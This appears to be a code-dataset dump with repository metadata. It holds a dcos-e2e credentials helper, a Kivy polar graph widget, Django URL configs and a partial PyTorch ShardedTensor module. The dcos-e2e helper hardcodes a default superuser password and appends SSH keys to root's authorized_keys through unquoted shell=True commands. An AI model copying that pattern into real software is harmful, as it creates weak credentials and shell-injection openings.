2017-09-08T02:24:58.000Z
|
2018-05-16T12:18:58.000Z
|
src/dcos_e2e_cli/common/credentials.py
|
jongiddy/dcos-e2e
|
b52ef9a1097a8fb328902064345cc6c8b0bf5779
|
[
"Apache-2.0"
] | 21
|
2018-06-14T21:58:24.000Z
|
2021-11-15T19:18:06.000Z
|
"""
Credentials used when making CLIs.
"""
from pathlib import Path
from dcos_e2e.cluster import Cluster
DEFAULT_SUPERUSER_USERNAME = 'bootstrapuser'
DEFAULT_SUPERUSER_PASSWORD = 'deleteme'
def add_authorized_key(cluster: Cluster, public_key_path: Path) -> None:
"""
Add an authorized key to all nodes in the given cluster.
"""
nodes = {
*cluster.masters,
*cluster.agents,
*cluster.public_agents,
}
for node in nodes:
node.run(
args=['echo', '', '>>', '/root/.ssh/authorized_keys'],
shell=True,
)
node.run(
args=[
'echo',
public_key_path.read_text(),
'>>',
'/root/.ssh/authorized_keys',
],
shell=True,
)
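# Hedged usage sketch (illustration only; the key path is an assumption):
#
#   add_authorized_key(cluster, Path('~/.ssh/id_rsa.pub').expanduser())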
| 22
| 72
| 0.540541
|
from pathlib import Path
from dcos_e2e.cluster import Cluster
DEFAULT_SUPERUSER_USERNAME = 'bootstrapuser'
DEFAULT_SUPERUSER_PASSWORD = 'deleteme'
def add_authorized_key(cluster: Cluster, public_key_path: Path) -> None:
nodes = {
*cluster.masters,
*cluster.agents,
*cluster.public_agents,
}
for node in nodes:
node.run(
args=['echo', '', '>>', '/root/.ssh/authorized_keys'],
shell=True,
)
node.run(
args=[
'echo',
public_key_path.read_text(),
'>>',
'/root/.ssh/authorized_keys',
],
shell=True,
)
| true
| true
|
790b1759dac2822a565da21263cc32769cb33853
| 2,698
|
py
|
Python
|
Exode/UI/polarGraph.py
|
RenatoTorres/Exode
|
fd7f6f51a04a88d404dcbed34acd5b8c2f54e54a
|
[
"Apache-2.0"
] | null | null | null |
Exode/UI/polarGraph.py
|
RenatoTorres/Exode
|
fd7f6f51a04a88d404dcbed34acd5b8c2f54e54a
|
[
"Apache-2.0"
] | 1
|
2018-08-09T23:45:01.000Z
|
2018-08-09T23:45:01.000Z
|
Exode/UI/polarGraph.py
|
RenatoTorres/Exode
|
fd7f6f51a04a88d404dcbed34acd5b8c2f54e54a
|
[
"Apache-2.0"
] | null | null | null |
from kivy.lang import Builder
from kivy.uix.widget import Widget
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.gridlayout import GridLayout
from kivy.graphics import *
from kivy.graphics.texture import Texture
from kivy.properties import ListProperty
from .gardenGraph import Plot
from .ExdLabel import *
import math
class PolarGraph(Widget):
def __init__(self, radial_tick=4, linear_tick=10, scale=10, **kwargs):
self.bind(pos=self.draw,
size=self.draw)
self.tick_color= [0.51, 0.51, 0.51, 1]
self.plots= []
self.nb_radial_tick= radial_tick
self.nb_linear_tick= linear_tick
self.scale= scale
super(PolarGraph, self).__init__(**kwargs)
self.ratio= 1
if self.size_hint[0] != None:
self.ratio= self.size_hint[0]
def draw(self, *args):
self.canvas.clear()
if hasattr(self, "parent"):
self.ratio= min(self.parent.size_hint_x, self.parent.size_hint_y)
self.dim= min(self.width, self.height)
self.update_ticks(*args)
self.update_plots(*args)
def update_ticks(self, *args):
with self.canvas:
Color(*self.tick_color)
for i in range(1,self.nb_radial_tick+1):
Line(circle=(self.center_x,
self.center_y,
self.ratio*i*(self.height/self.nb_radial_tick)/2))
for i in range(1,self.nb_linear_tick+1):
tick_len = self.dim*self.ratio*.5
Line(points=[self.center_x-tick_len*math.cos(i*(3.14/self.nb_linear_tick)),
self.center_y-tick_len*math.sin(i*(3.14/self.nb_linear_tick)),
self.center_x+tick_len*math.cos(i*(3.14/self.nb_linear_tick)),
self.center_y+tick_len*math.sin(i*(3.14/self.nb_linear_tick))],
width=1)
def add_plot(self, plot):
if plot in self.plots:
return
plot.bind(on_clear_plot=self.draw)
self.update_plots()
self.plots.append(plot)
def update_plots(self, *args):
for plot in self.plots:
with self.canvas:
Color(plot.color)
for pt in plot.points:
t= pt[0]
a= math.radians(pt[1][0])
m= pt[1][1]
x= self.center_x + math.cos(a)*min(1,m/self.scale)*(self.dim*self.ratio)*.5
y= self.center_y + math.sin(a)*min(1,m/self.scale)*(self.dim*self.ratio)*.5
Rectangle(pos=(x,y), size=(2,2))
class polarPlot(Plot):
pass
| 31.372093
| 95
| 0.569311
|
from kivy.lang import Builder
from kivy.uix.widget import Widget
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.gridlayout import GridLayout
from kivy.graphics import *
from kivy.graphics.texture import Texture
from kivy.properties import ListProperty
from .gardenGraph import Plot
from .ExdLabel import *
import math
class PolarGraph(Widget):
def __init__(self, radial_tick=4, linear_tick=10, scale=10, **kwargs):
self.bind(pos=self.draw,
size=self.draw)
self.tick_color= [0.51, 0.51, 0.51, 1]
self.plots= []
self.nb_radial_tick= radial_tick
self.nb_linear_tick= linear_tick
self.scale= scale
super(PolarGraph, self).__init__(**kwargs)
self.ratio= 1
if self.size_hint[0] != None:
self.ratio= self.size_hint[0]
def draw(self, *args):
self.canvas.clear()
if hasattr(self, "parent"):
self.ratio= min(self.parent.size_hint_x, self.parent.size_hint_y)
self.dim= min(self.width, self.height)
self.update_ticks(*args)
self.update_plots(*args)
def update_ticks(self, *args):
with self.canvas:
Color(*self.tick_color)
for i in range(1,self.nb_radial_tick+1):
Line(circle=(self.center_x,
self.center_y,
self.ratio*i*(self.height/self.nb_radial_tick)/2))
for i in range(1,self.nb_linear_tick+1):
tick_len = self.dim*self.ratio*.5
Line(points=[self.center_x-tick_len*math.cos(i*(3.14/self.nb_linear_tick)),
self.center_y-tick_len*math.sin(i*(3.14/self.nb_linear_tick)),
self.center_x+tick_len*math.cos(i*(3.14/self.nb_linear_tick)),
self.center_y+tick_len*math.sin(i*(3.14/self.nb_linear_tick))],
width=1)
def add_plot(self, plot):
if plot in self.plots:
return
plot.bind(on_clear_plot=self.draw)
self.update_plots()
self.plots.append(plot)
def update_plots(self, *args):
for plot in self.plots:
with self.canvas:
Color(plot.color)
for pt in plot.points:
t= pt[0]
a= math.radians(pt[1][0])
m= pt[1][1]
x= self.center_x + math.cos(a)*min(1,m/self.scale)*(self.dim*self.ratio)*.5
y= self.center_y + math.sin(a)*min(1,m/self.scale)*(self.dim*self.ratio)*.5
Rectangle(pos=(x,y), size=(2,2))
class polarPlot(Plot):
pass
| true
| true
|
790b17823832d542e9f2d0aff12b5b79aa574df5
| 684
|
py
|
Python
|
wouso/interface/apps/files/cpanel_urls.py
|
AlexandruGhergut/wouso
|
f26244ff58ae626808ae8c58ccc93d21f9f2666f
|
[
"Apache-2.0"
] | 117
|
2015-01-02T18:07:33.000Z
|
2021-01-06T22:36:25.000Z
|
wouso/interface/apps/files/cpanel_urls.py
|
AlexandruGhergut/wouso
|
f26244ff58ae626808ae8c58ccc93d21f9f2666f
|
[
"Apache-2.0"
] | 229
|
2015-01-12T07:07:58.000Z
|
2019-10-12T08:27:01.000Z
|
wouso/interface/apps/files/cpanel_urls.py
|
AlexandruGhergut/wouso
|
f26244ff58ae626808ae8c58ccc93d21f9f2666f
|
[
"Apache-2.0"
] | 96
|
2015-01-07T05:26:09.000Z
|
2020-06-25T07:28:51.000Z
|
from django.conf.urls import patterns, url
urlpatterns = patterns('wouso.interface.apps.files.cpanel_views',
url(r'^$', 'files', name='files'),
url(r'^add_file/$', 'add_file', name='add_file'),
url(r'^edit_file/(?P<pk>\d+)/$', 'edit_file', name='edit_file'),
url(r'^delete_file/(?P<pk>\d+)/$', 'delete_file', name='delete_file'),
url(r'^manage_categories/$', 'manage_categories', name='manage_file_categories'),
url(r'^add_category/$', 'add_category', name='add_file_category'),
url(r'^edit_category/(?P<pk>\d+)/$', 'edit_category', name='edit_file_category'),
url(r'^delete_category/(?P<pk>\d+)/$', 'delete_category', name='delete_file_category'),
)
| 52.615385
| 91
| 0.663743
|
from django.conf.urls import patterns, url
urlpatterns = patterns('wouso.interface.apps.files.cpanel_views',
url(r'^$', 'files', name='files'),
url(r'^add_file/$', 'add_file', name='add_file'),
url(r'^edit_file/(?P<pk>\d+)/$', 'edit_file', name='edit_file'),
url(r'^delete_file/(?P<pk>\d+)/$', 'delete_file', name='delete_file'),
url(r'^manage_categories/$', 'manage_categories', name='manage_file_categories'),
url(r'^add_category/$', 'add_category', name='add_file_category'),
url(r'^edit_category/(?P<pk>\d+)/$', 'edit_category', name='edit_file_category'),
url(r'^delete_category/(?P<pk>\d+)/$', 'delete_category', name='delete_file_category'),
)
| true
| true
|
790b182fac02f2f5d7712f5ef02a0852c6baebfa
| 1,162
|
py
|
Python
|
ajax/urls.py
|
joestump/django-ajax
|
b71619d5c00d8e0bb990ddbea2c93cf303dc2c80
|
[
"BSD-3-Clause"
] | 62
|
2015-01-09T23:02:06.000Z
|
2020-12-27T19:44:58.000Z
|
ajax/urls.py
|
joestump/django-ajax
|
b71619d5c00d8e0bb990ddbea2c93cf303dc2c80
|
[
"BSD-3-Clause"
] | 7
|
2015-03-26T21:52:54.000Z
|
2016-06-20T20:53:43.000Z
|
ajax/urls.py
|
joestump/django-ajax
|
b71619d5c00d8e0bb990ddbea2c93cf303dc2c80
|
[
"BSD-3-Clause"
] | 12
|
2015-02-23T11:58:44.000Z
|
2020-10-26T22:32:58.000Z
|
from __future__ import absolute_import
from django.conf.urls import *
from django.views.static import serve
from ajax import views
import django
import os
JAVASCRIPT_PATH = "%s/js" % os.path.dirname(__file__)
if django.VERSION < (1, 8):
urlpatterns = patterns('ajax.views',
(r'^(?P<application>\w+)/(?P<model>\w+).json', 'endpoint_loader'),
(r'^(?P<application>\w+)/(?P<model>\w+)/(?P<method>\w+).json', 'endpoint_loader'),
(r'^(?P<application>\w+)/(?P<model>\w+)/(?P<pk>\d+)/(?P<method>\w+)/?(?P<taggit_command>(add|remove|set|clear|similar))?.json$', 'endpoint_loader'),
(r'^js/(?P<path>.*)$', serve,
{'document_root': JAVASCRIPT_PATH}),
)
else:
urlpatterns = [
url(r'^(?P<application>\w+)/(?P<model>\w+).json', views.endpoint_loader),
url(r'^(?P<application>\w+)/(?P<model>\w+)/(?P<method>\w+).json', views.endpoint_loader),
url(r'^(?P<application>\w+)/(?P<model>\w+)/(?P<pk>\d+)/(?P<method>\w+)/?(?P<taggit_command>(add|remove|set|clear|similar))?.json$', views.endpoint_loader),
url(r'^js/(?P<path>.*)$', serve,
{'document_root': JAVASCRIPT_PATH}),
]
| 44.692308
| 163
| 0.598967
|
from __future__ import absolute_import
from django.conf.urls import *
from django.views.static import serve
from ajax import views
import django
import os
JAVASCRIPT_PATH = "%s/js" % os.path.dirname(__file__)
if django.VERSION < (1, 8):
urlpatterns = patterns('ajax.views',
(r'^(?P<application>\w+)/(?P<model>\w+).json', 'endpoint_loader'),
(r'^(?P<application>\w+)/(?P<model>\w+)/(?P<method>\w+).json', 'endpoint_loader'),
(r'^(?P<application>\w+)/(?P<model>\w+)/(?P<pk>\d+)/(?P<method>\w+)/?(?P<taggit_command>(add|remove|set|clear|similar))?.json$', 'endpoint_loader'),
(r'^js/(?P<path>.*)$', serve,
{'document_root': JAVASCRIPT_PATH}),
)
else:
urlpatterns = [
url(r'^(?P<application>\w+)/(?P<model>\w+).json', views.endpoint_loader),
url(r'^(?P<application>\w+)/(?P<model>\w+)/(?P<method>\w+).json', views.endpoint_loader),
url(r'^(?P<application>\w+)/(?P<model>\w+)/(?P<pk>\d+)/(?P<method>\w+)/?(?P<taggit_command>(add|remove|set|clear|similar))?.json$', views.endpoint_loader),
url(r'^js/(?P<path>.*)$', serve,
{'document_root': JAVASCRIPT_PATH}),
]
| true
| true
|
790b18c838d2e1ac885c3773cd7a0f20395937c4
| 30,641
|
py
|
Python
|
torch/distributed/_sharded_tensor/api.py
|
steffenerickson/pytorch
|
0b656c4c69ce77ecd9aace486e471917e4660746
|
[
"Intel"
] | 1
|
2022-02-13T15:29:24.000Z
|
2022-02-13T15:29:24.000Z
|
torch/distributed/_sharded_tensor/api.py
|
steffenerickson/pytorch
|
0b656c4c69ce77ecd9aace486e471917e4660746
|
[
"Intel"
] | null | null | null |
torch/distributed/_sharded_tensor/api.py
|
steffenerickson/pytorch
|
0b656c4c69ce77ecd9aace486e471917e4660746
|
[
"Intel"
] | null | null | null |
from dataclasses import dataclass, field
from enum import Enum
from typing import (
Callable,
Dict,
List,
Optional,
Union
)
import weakref
import threading
import torch
import torch.distributed as dist
from torch.distributed import rpc
from torch.distributed import distributed_c10d
from torch.distributed._sharding_spec import (
ChunkShardingSpec,
EnumerableShardingSpec,
ShardMetadata,
ShardingSpec,
)
from torch.distributed._sharding_spec._internals import (
check_tensor,
get_split_size,
get_chunked_dim_size,
validate_non_overlapping_shards_metadata,
)
from torch.types import Number
from .metadata import TensorProperties, ShardedTensorMetadata
from .shard import Shard
from .utils import (
get_current_process_group,
_flatten_tensor_size,
_parse_and_validate_remote_device,
_validate_output_tensor_for_gather,
build_metadata_from_local_shards,
build_global_metadata
)
# Tracking for sharded tensor objects.
_sharded_tensor_lock = threading.Lock()
_sharded_tensor_current_id = 0
_sharded_tensor_map: Dict[int, 'weakref.ReferenceType[ShardedTensor]'] = {}
# Custom sharded ops
_SHARDED_OPS: Dict[str, Callable] = {}
def _register_sharded_op(op, func):
from inspect import signature
if len(signature(func).parameters) != 4:
raise TypeError(
f'Custom sharded op function expects signature: '
f'(types, args, kwargs, process_group), but received '
f'signature: {signature(func)}')
global _SHARDED_OPS
_SHARDED_OPS[op] = func
def _register_remote_shards(sharded_tensor_id: int, rrefs: List[rpc.RRef[Shard]], rpc_rank: int):
with _sharded_tensor_lock:
if sharded_tensor_id not in _sharded_tensor_map:
raise RuntimeError(
f'Could not find sharded_tensor_id: {sharded_tensor_id} in map: {_sharded_tensor_map.keys()}')
sharded_tensor = _sharded_tensor_map[sharded_tensor_id]()
if sharded_tensor is None:
raise RuntimeError('ShardedTensor weakref has been deallocated')
else:
sharded_tensor._register_remote_shards(rrefs, rpc_rank)
class CreateOp(Enum):
EMPTY = 0
FULL = 1
ONES = 2
RAND = 3
ZEROS = 4
@dataclass
class TensorInitParams(object):
""" Container for list of common params to create new local tensor. """
create_op: CreateOp
# needed when create_op is FULL
# default set to False (not None) since None is incompatible with Number.
fill_value: Number = field(default=False)
tensor_properties: TensorProperties = field(
default=TensorProperties(dtype=torch.get_default_dtype(),
layout=torch.strided,
requires_grad=False,
memory_format=torch.contiguous_format,
pin_memory=False))
class ShardedTensor(object):
"""
ShardedTensor is an abstraction to represent Tensors that are sharded
across multiple devices and multiple processes.
ShardedTensor is initialized in an SPMD like fashion where each rank
initializes the ShardedTensor. The ShardedTensor object on each rank
then only stores the local shard for the Tensor and provides global
metadata for all the shards.
ShardedTensor doesn't provide any Tensor like operations but is a wrapper
providing the Tensor representing the local shard and the global metadata.
Using these, users can build their custom distributed sharded computations
on top of this primitive. The local shards are all initialized using the
create_op specified by tensor_init_params.create_op, e.g., torch.ones, or
torch.empty
Args:
sharding_spec (:class:`torch.distributed._sharding_spec.ShardingSpec`): The specification
describing how to shard the Tensor.
size (int...): a sequence of integers defining the shape of the output
tensor. Can be a variable number of arguments or a collection like a list or tuple.
Keyword args:
tensor_init_params (:class:`TensorInitParams`): common params to create tensor.
init_rrefs (bool, optional): Whether or not to initialize
:class:`torch.distributed.rpc.RRef`s pointing to remote shards.
Need to initialize the RPC Framework if specified as ``True``.
Default: ``False``.
.. note:: ShardedTensor uses collectives to do various operations, i.e. it
uses all_gather to do cross rank validations. For NCCL-based process
groups, internal tensor representations of objects must be moved to the
GPU device before communication takes place. In this case, the device
used is given by ``torch.cuda.current_device()`` and it is the user's
responsibility to ensure that this is set so that each rank has an
individual GPU, via ``torch.cuda.set_device()``
"""
def __new__(cls, *args, **kwargs):
# Use __new__ for logging purposes.
torch._C._log_api_usage_once("torch.distributed.sharded_tensor")
return super(ShardedTensor, cls).__new__(cls)
def __init__(
self,
sharding_spec: ShardingSpec,
*size,
tensor_init_params: TensorInitParams,
process_group=None,
init_rrefs=False,
):
# prepare initialization, initialize fields like
# _process_group, _local_shards, etc.
self._prepare_init(process_group=process_group, init_rrefs=init_rrefs)
if tensor_init_params.tensor_properties is None:
raise ValueError('tensor_properties must not be None.')
if tensor_init_params.tensor_properties.dtype is None:
tensor_init_params.tensor_properties.dtype = torch.get_default_dtype()
if tensor_init_params.tensor_properties.layout != torch.strided:
raise ValueError('Only torch.strided layout is currently supported')
if tensor_init_params.tensor_properties.memory_format != torch.contiguous_format:
raise ValueError('Only torch.contiguous_format memory_format is currently supported')
dims = _flatten_tensor_size(size)
self._sharding_spec = sharding_spec
if isinstance(self._sharding_spec, ChunkShardingSpec):
self._init_chunked(dims, tensor_init_params)
elif isinstance(self._sharding_spec, EnumerableShardingSpec):
self._init_enumerable(dims, tensor_init_params)
else:
raise ValueError(f'Unsupported sharding_spec: {self._sharding_spec}')
# do post initialization (i.e. register sharded_tensor_id, initialize_rpc)
self._post_init()
def _prepare_init(self, process_group=None, init_rrefs=False):
self._init_rrefs = init_rrefs
self._sharded_tensor_id = None
self._process_group = (
process_group
if process_group is not None
else distributed_c10d._get_default_group()
)
self._local_shards: List[Shard] = []
self._remote_shards: Dict[int, List[rpc.RRef[Shard]]] = {}
def _post_init(self):
# Initialize RPC if available.
if self._init_rrefs:
with _sharded_tensor_lock:
global _sharded_tensor_current_id, _sharded_tensor_map
self._sharded_tensor_id = _sharded_tensor_current_id
_sharded_tensor_map[self._sharded_tensor_id] = weakref.ref(self)
_sharded_tensor_current_id += 1
if not rpc._is_current_rpc_agent_set():
raise RuntimeError(
'RPC Framework needs to be initialized using'
' torch.distributed.rpc.init_rpc if init_rrefs is set to True')
self._init_rpc()
def __del__(self):
# Clean up the global map.
with _sharded_tensor_lock:
global _sharded_tensor_current_id, _sharded_tensor_map
if self._sharded_tensor_id in _sharded_tensor_map:
_sharded_tensor_map.pop(self._sharded_tensor_id) # type: ignore[call-overload]
def _init_rpc(self):
# Validate PG and RPC ranks match.
pg_rank = dist.get_rank()
rpc_rank = rpc.get_worker_info().id
if pg_rank != rpc_rank:
raise ValueError(
f'Default ProcessGroup and RPC ranks must be '
f'the same for ShardedTensor, found process group rank: '
f'{pg_rank} and RPC rank: {rpc_rank}'
)
self._remote_shards = {}
# Gather all the sharded tensor ids.
worker_infos = rpc._get_current_rpc_agent().get_worker_infos()
rank_to_name = {}
name_to_rank = {}
for worker_info in worker_infos:
rank_to_name[worker_info.id] = worker_info.name
name_to_rank[worker_info.name] = worker_info.id
all_tensor_ids = rpc.api._all_gather(self._sharded_tensor_id)
# Share the local shards to the entire world.
futs = []
rpc_rank = rpc.get_worker_info().id
for rank in range(dist.get_world_size()):
# Skip self.
if rank == dist.get_rank():
continue
if len(self.local_shards()) != 0:
rrefs: List[rpc.RRef[Shard]] = [rpc.RRef(shard) for shard in self.local_shards()]
fut = rpc.rpc_async(
rank,
_register_remote_shards,
args=(all_tensor_ids[rank_to_name[rank]], rrefs, rpc_rank))
futs.append(fut)
torch.futures.wait_all(futs)
# Barrier for all RPCs to finish on all ranks.
rpc.api._all_gather(None)
def gather(
self,
dst: int = 0,
out: Optional[torch.Tensor] = None,
) -> None:
"""
Creates a full :class:`Tensor` on rank ``dst`` by gathering all shards of the
sharded tensor.
The API needs to be called on all ranks in SPMD fashion. All ranks should have
the same ``dst``. ``out`` should be a tensor of the same size as the overall
size of the sharded tensor on ``dst`` and ``None`` on all other ranks.
Args:
dst(int): The rank where full tensor is constructed.
Default: 0
out (:class:`torch.Tensor`, optional): The output full tensor.
Must be provided ONLY on ``dst`` rank.
Default: ``None``
"""
rank = dist.get_rank(self._process_group)
full_size = self.metadata().size
_validate_output_tensor_for_gather(rank, dst, full_size, out)
local_shards = self.local_shards()
world_size = dist.get_world_size(self._process_group)
gathered_shards = [None] * world_size
# will revise this part with CPU support and use dist.gather()
# once NCCL support for gather() is ready
# https://github.com/pytorch/pytorch/issues/66187
dist.all_gather_object(
obj=local_shards,
object_list=gathered_shards,
group=self._process_group,
)
if rank == dst:
dims = len(full_size)
for shards in gathered_shards:
if shards is None:
raise RuntimeError(
f'Gathered shards cannot be None on dst rank {dst}'
)
for shard in shards:
metadata = shard.metadata
tensor = shard.tensor
out_narrow_view = out
for dim in range(dims):
out_narrow_view = out_narrow_view.narrow(
dim,
metadata.shard_offsets[dim],
metadata.shard_sizes[dim],
)
out_narrow_view.copy_(tensor)
@classmethod
def _init_from_local_shards(
cls,
local_shards: List[Shard],
*global_size,
process_group=None,
init_rrefs=False,
):
# STEP 1: Validate the ShardMetadata objects locally
process_group = (
process_group
if process_group is not None
else distributed_c10d._get_default_group()
)
current_rank = dist.get_rank(process_group)
world_size = dist.get_world_size(process_group)
local_sharded_tensor_metadata: Optional[ShardedTensorMetadata] = None
global_tensor_size = _flatten_tensor_size(global_size)
if len(local_shards) > 0:
local_sharded_tensor_metadata = \
build_metadata_from_local_shards(local_shards, global_tensor_size, current_rank, process_group)
# STEP 2. Validate metadata across ranks, and build a global sharded tensor
# metadata by gathering local ShardedTensorMetadata
gathered_metadatas: List[Optional[ShardedTensorMetadata]] = []
if world_size > 1:
gathered_metadatas = [None for _ in range(world_size)]
dist.all_gather_object(
gathered_metadatas,
local_sharded_tensor_metadata,
group=process_group
)
else:
gathered_metadatas = [local_sharded_tensor_metadata]
global_sharded_tensor_metadata = build_global_metadata(gathered_metadatas)
# STEP 3: Validation done, create the actual ShardedTensor and populate fields
# prepare initialization
sharded_tensor = cls.__new__(cls)
sharded_tensor._prepare_init(process_group=process_group, init_rrefs=init_rrefs)
# add to metadata and local_shards
sharded_tensor._metadata = global_sharded_tensor_metadata
sharded_tensor._local_shards = local_shards
# make an EnumerableShardingSpec for sharded tensors that are initialized from this API.
# TODO: make sharding spec a ChunkShardingSpec by inferring from the metadata list.
# see issue https://github.com/pytorch/pytorch/issues/67244
sharded_tensor._sharding_spec = EnumerableShardingSpec(global_sharded_tensor_metadata.shards_metadata)
# run post initialization, i.e. map registration, rpc initialization
sharded_tensor._post_init()
return sharded_tensor
@classmethod
def _init_from_local_shards_and_global_metadata(
cls,
local_shards: List[Shard],
sharded_tensor_metadata: ShardedTensorMetadata,
process_group=None,
init_rrefs=False,
) -> "ShardedTensor":
"""
Initialize a ShardedTensor with local shards and a global
ShardedTensorMetadata built on each rank.
Warning: This API is experimental and subject to change. It does
not do cross rank validations, and fully relies on the user
for the correctness of sharded_tensor_metadata on each rank
"""
process_group = (
process_group
if process_group is not None
else distributed_c10d._get_default_group()
)
current_rank = dist.get_rank(process_group)
shards_metadata = sharded_tensor_metadata.shards_metadata
tensor_properties = sharded_tensor_metadata.tensor_properties
if len(shards_metadata) == 0:
raise ValueError("shards_metadata must not be empty!")
if tensor_properties.layout != torch.strided:
raise ValueError('Only torch.strided layout is currently supported')
sharded_tensor = cls.__new__(cls)
sharded_tensor._prepare_init(process_group=process_group, init_rrefs=init_rrefs)
sharded_tensor._metadata = sharded_tensor_metadata
local_shard_metadatas = []
def _raise_if_mismatch(expected, actual, prop_name, rank, is_property=False):
tensor_property_or_metadata = "tensor property" if is_property else "local ShardMetadata"
if expected != actual:
raise ValueError(f"Local shards' tensor {prop_name} property is incompatible with "
f"{tensor_property_or_metadata} on rank {rank}: "
f"{tensor_property_or_metadata} {prop_name}={expected}, "
f"local shard tensor {prop_name}={actual}.")
# collect local shard metadatas from the global sharded_tensor_metadata
for shard_metadata in shards_metadata: # type: ignore[attr-defined]
rank, local_device = _parse_and_validate_remote_device(sharded_tensor._process_group, shard_metadata.placement)
if current_rank == rank:
local_shard_metadatas.append(shard_metadata)
if len(local_shards) != len(local_shard_metadatas):
raise RuntimeError(
f'Number of local shards ({len(local_shards)}) does not match number of local '
f'shards metadata in sharded_tensor_metadata ({len(local_shard_metadatas)}) '
f'on rank ({current_rank}) '
)
for shard in local_shards:
shard_meta = shard.metadata
local_shard_tensor = shard.tensor
rank, local_device = _parse_and_validate_remote_device(sharded_tensor._process_group, shard_meta.placement)
# validate if shard_meta in the metadatas collected from sharded_tensor_metadata
assert shard_meta in local_shard_metadatas, \
"local shard metadata not in sharded_tensor_metadata!"
_raise_if_mismatch(tensor_properties.layout, local_shard_tensor.layout, "layout", current_rank, True)
if not local_shard_tensor.is_contiguous():
raise ValueError('Only torch.contiguous_format memory_format is currently supported')
_raise_if_mismatch(shard_meta.shard_sizes, list(local_shard_tensor.size()), "size", current_rank)
_raise_if_mismatch(tensor_properties.pin_memory, local_shard_tensor.is_pinned(), "pin_memory", current_rank, True)
_raise_if_mismatch(local_device, local_shard_tensor.device, "device", current_rank)
_raise_if_mismatch(tensor_properties.dtype, local_shard_tensor.dtype, "dtype", current_rank, True)
_raise_if_mismatch(
tensor_properties.requires_grad, local_shard_tensor.requires_grad, "requires_grad", current_rank, True)
# check if shards_metadata contains overlapping shards
validate_non_overlapping_shards_metadata(shards_metadata)
# check if the shards_metadata is compatible with overall size of the sharded tensor.
check_tensor(shards_metadata, list(sharded_tensor_metadata.size))
# done validation, add local_shards
sharded_tensor._local_shards = local_shards
# make an EnumerableShardingSpec for sharded tensors that are initialized from this API.
# TODO: make sharding spec a ChunkShardingSpec by inferring from the metadata list.
# see issue https://github.com/pytorch/pytorch/issues/67244
sharded_tensor._sharding_spec = EnumerableShardingSpec(shards_metadata)
# run post initialization, i.e. map registration, rpc initialization
sharded_tensor._post_init()
return sharded_tensor
def _init_chunked(self, dims, tensor_init_params: TensorInitParams, ):
current_rank = dist.get_rank(self._process_group)
sharding_dim = self._sharding_spec.dim # type: ignore[attr-defined]
# Validate the sharding spec.
if not isinstance(sharding_dim, int):
raise ValueError(
f"Sharding dim needs to be an integer, found: {sharding_dim}"
)
if sharding_dim >= len(dims) or sharding_dim < -len(dims):
raise ValueError(f"Invalid sharding dim: {sharding_dim}")
dim_size = dims[sharding_dim]
remote_devices = self._sharding_spec.placements # type: ignore[attr-defined]
chunks = len(remote_devices)
# split_size computed similar to 'torch.chunk'
split_size = get_split_size(dim_size, chunks)
shards_metadata = []
for idx, remote_device in enumerate(remote_devices):
rank, local_device = _parse_and_validate_remote_device(self._process_group, remote_device)
# Adjust the sharding dim for this rank.
sharded_dim_size = get_chunked_dim_size(dim_size, split_size, idx)
if sharded_dim_size > 0:
# Build sharding_metadata.
# deepcopy for modification.
rank_dims = dims.copy()
rank_offsets = [0] * len(dims)
rank_offsets[sharding_dim] = split_size * idx
rank_dims[sharding_dim] = sharded_dim_size
shard_metadata = ShardMetadata(rank_offsets, rank_dims, remote_device)
shards_metadata.append(shard_metadata)
# Build the local shard for the current rank if it is involved in the sharding spec.
if current_rank == rank:
# Initialize the local shard.
local_shard = _create_tensor_from_params(
*rank_dims, local_device=local_device, tensor_init_params=tensor_init_params)
self._local_shards.append(Shard(local_shard, shard_metadata))
# Build overall metadata
self._metadata = ShardedTensorMetadata(
shards_metadata, dims, tensor_init_params.tensor_properties, )
def _init_enumerable(self, dims, tensor_init_params: TensorInitParams):
# Validate the sharding spec is compatible with the tensor.
check_tensor(self._sharding_spec.shards, dims) # type: ignore[attr-defined]
current_rank = dist.get_rank(self._process_group)
shards_metadata = []
for shard_metadata in self._sharding_spec.shards: # type: ignore[attr-defined]
rank, local_device = _parse_and_validate_remote_device(self._process_group, shard_metadata.placement)
shards_metadata.append(shard_metadata)
if current_rank == rank:
# Initialize the local shard.
local_shard = _create_tensor_from_params(
*shard_metadata.shard_sizes, local_device=local_device,
tensor_init_params=tensor_init_params)
self._local_shards.append(Shard(local_shard, shard_metadata))
# Build overall metadata
self._metadata = ShardedTensorMetadata(
shards_metadata, dims, tensor_init_params.tensor_properties, )
def sharding_spec(self) -> ShardingSpec:
"""
Returns the ShardingSpec for the tensor.
"""
return self._sharding_spec
def __torch_function__(self, func, types, args=(), kwargs=None):
if func in _SHARDED_OPS:
return _SHARDED_OPS[func](types, args, kwargs, self._process_group)
raise RuntimeError(
f"torch function '{func.__name__}', with args: {args} and "
f"kwargs: {kwargs} not supported for ShardedTensor!")
def metadata(self) -> ShardedTensorMetadata:
"""
Returns a :class:`ShardedTensorMetadata` object corresponding to the
metadata for the entire tensor.
"""
return self._metadata
def local_shards(self) -> List[Shard]:
"""
Returns a list of :class:`Shard` objects corresponding to the
local shards for this rank. Returns an empty list if the current rank
does not host any shards for this Tensor.
"""
return self._local_shards
def size(self, dim: int = None) -> Union[torch.Size, int]:
"""
Returns a ``Union[torch.Size, int]`` which represents the size of the tensor.
The dimension can be specified.
Args:
dim (int, optional): the dimension for which the size is requested.
If specified, it returns the size of the given dimension.
If not, it returns a subclass of tuple.
Default: ``None``
Returns:
A ``Union[torch.Size, int]`` representing the size of the tensor.
"""
size = self._metadata.size
if dim is None:
return size
if dim < 0 or dim >= len(size):
raise ValueError(
f"Argument ``dim`` must be within the range of tensor dimensions [0, {len(size)})"
)
return size[dim]
def is_pinned(self) -> bool:
"""
Returns True if the sharded tensor (each local shard) resides in pinned memory.
"""
return self._metadata.tensor_properties.pin_memory
def is_contiguous(self) -> bool:
"""
Returns True if the sharded tensor (each local shard) is contiguous in memory
in the order specified by memory format.
"""
return self._metadata.tensor_properties.memory_format == torch.contiguous_format
@property
def shape(self):
return self._metadata.size
@property
def requires_grad(self):
return self._metadata.tensor_properties.requires_grad
@property
def dtype(self):
return self._metadata.tensor_properties.dtype
@property
def layout(self):
return self._metadata.tensor_properties.layout
def _register_remote_shards(self, remote_shards: List[rpc.RRef[Shard]], rpc_rank: int):
self._remote_shards[rpc_rank] = remote_shards
def remote_shards(self) -> Dict[int, List[rpc.RRef[Shard]]]:
"""
Returns a Dict[int, RRef] with keys being the RPC rank and values
being RRefs to shards on that rank. Need to initialize the
RPC framework for this functionality.
